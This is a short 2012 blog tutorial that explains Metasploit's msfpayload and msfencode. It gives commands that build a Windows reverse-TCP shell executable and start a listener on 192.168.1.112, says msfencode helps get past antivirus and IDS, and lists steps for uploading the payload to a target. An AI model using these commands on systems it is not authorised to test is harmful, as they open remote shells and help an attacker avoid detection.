Laman

Senin, 27 Februari 2012

What is MSFpayload & MSFencode and Implemantation

Msfpayload :

Msfpayload is one of the many great tools included with theMetasploit Framework. It can be used to create customized payloads.To run Msfpayload, first select one of the many payloads included inthe framework. Then provide the parameters for the payload and theoutput format you want it to generate, and it will create acustomized payload for you. You can take the resulting file andinclude it in your own exploits written in C, Ruby, Perl, Java orother languages. It also has the ability to create executableprograms. These
standalone payloads can be executed on a hostindependently of the framework exploitation engine. This is usefulfor attackers who want to gain access to fully patched machines byenticing the user to run their payload. It is also useful toattackers who want to use the Meterpreter payload, IDS and forensicsevasion in the framework, but have gained access to the host througha method which is not in the framework. For example, if anattacker already has remote access through a guessed login andpassword or a custom exploit they developed outside of the framework,they can use that access to launch a Meterpreter standalone payloadand still take advantage of framework.

ex : Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

Target:
run reverse-shell.exe


MSFencode :

MSFendoce is the shellcode generated by msfpayload is fully functional, but it contains several null characters that, when interpreted by many programs, signify the end of a string, and this will cause the code to terminate before completion. In other words, those x00s and xffs can break your payload! In addition, shellcode traversing a network in cleartext is likely to be picked up by intrusion detection systems (IDSs) and antivirus software. To address this problem, Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade antivirus and IDSs by encoding the original payload in a way that does not include “bad” characters. 


Implemantation :


try to open msfconsole
show options
now make a payload
than now we try to make file .exe it's too make us listening from target
upload that file on target.
using upload for upload file from meterpreter.

Tidak ada komentar:

Posting Komentar